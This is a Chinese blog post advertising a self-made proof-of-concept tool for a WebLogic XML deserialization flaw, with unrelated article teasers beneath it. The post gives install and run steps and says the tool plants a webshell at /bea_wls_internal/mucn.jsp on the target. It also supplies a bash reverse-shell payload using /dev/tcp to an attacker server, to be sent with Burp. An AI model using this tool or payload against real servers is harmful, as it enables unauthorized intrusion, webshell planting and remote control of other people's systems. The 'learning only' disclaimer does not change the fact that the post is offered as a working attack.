当前位置:首页 > 杂文短讯 > [自制poc] weblogicXML反序漏洞

[自制poc] weblogicXML反序漏洞

网络大杂烩1年前 (2020-09-17)杂文短讯179

weblogic xml反序poc

地址:[自制poc] weblogicXML反序漏洞  第1张https://gitee.com/mucn/weblogic

weblogicXML
Description
weblogicXML漏洞检测利用工具

所需配置项:
python3+
requests模块
模块安装:
没用装request模块的运行如下命令安装模块

pip install requests

使用方法:
git clone [自制poc] weblogicXML反序漏洞  第1张https://gitee.com/mucn/weblogic
python3 [自制poc] weblogicXML反序漏洞  第3张weblogicXML.py

可能会出现的问题:
输入地址后程序长时间无反应或等待一段时间后出现报错。

如图1

解决方法:可能木马已经写入成功,请自行访问目标网站/bea_wls_internal/mucn.jsp 若存在如下页面说明木马写入成功。

[自制poc] weblogicXML反序漏洞  第4张

如图2

程序运行结果为:目标可能存在weblogicXML反序漏洞,但写马失败,请自行手动检测
解释:木马应该确实没有写入成功。

[自制poc] weblogicXML反序漏洞  第5张

如图3

解决:你可以使用burp发包方式向目标发送POC,进行反弹shell测试(一般这种是可以成功反弹shell的)。

反弹shell POC
 

/bin/bash

-c

bash -i >& /dev/tcp/服务器地址/服务器端口 0>&1

[自制poc] weblogicXML反序漏洞  第6张
[自制poc] weblogicXML反序漏洞  第7张

流量卡29包100G


免责声明:天天见博客网提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。如有侵权请邮件(leongpybingzla46@gmail.com)与我们联系处理。

本文链接:https://8848ka.cn/post/253.html

相关文章

学了高情商聊天话术,你还敢说你不会聊天吗?

学了高情商聊天话术,你还敢说你不会聊天吗?

1.别人问你会喝酒吗?错误回答:不行不行,我不会喝酒你可以这样回答:我擅长倒酒2.当有人夸你颜值很高你可以这样回答:我就喜欢你这么一本正经的说大实话3.别人说你有点矮呀错误回答:我矮管你啥事?你可以这...

七一勋章颁授仪式 习近平:在“七一勋章”颁授仪式上的讲话

七一勋章颁授仪式 习近平:在“七一勋章”颁授仪式上的讲话

七一勋章颁授仪式 习近平:在“七一勋章”颁授仪式上的讲话来源:新华社在“七一勋章”颁授仪式上的讲话(2021年6月29日)习近平同志们:今天,在庆祝中国共产党成立一百周年之际,我们在这里隆重举行仪式,...

千万不要只知道:打工+存钱

千万不要只知道:打工+存钱

在最该奋斗的时候千万不要只知道“打工+存钱”提到攒钱,很多人都知道努力工作寻求升职加薪,然后将辛苦挣来的钱存入银行。殊不知,当你把钱存进去的那一刻,你的钱可能每分每秒都在减少。银行2-3%的利息,余额...

突发!美国宣布“净网”:要封杀中国运营商,禁用 BAT 云服务,下架微信 TikTok等App

突发!美国宣布“净网”:要封杀中国运营商,禁用 BAT 云服务,下架微信 TikTok等App

美国又开始了新一轮的封禁行为。2020 年 8 月 5 日,美国国务卿 Mike Pompeo 召开记者会,宣布了一项旨在“遏制潜在的国家安全风险”的清洁网络计划(Clean Network)。在该计...

六月份前三周手机市场占有率排名

六月份前三周手机市场占有率排名

六月份前三周手机市场占有率排名1、vivo:23%,去年同期14%2、OPPO:21%,去年同期14%3、小米:20%,去年同期10%4、苹果:14%,去年同期13%5、华为:10%,去年同期33%6...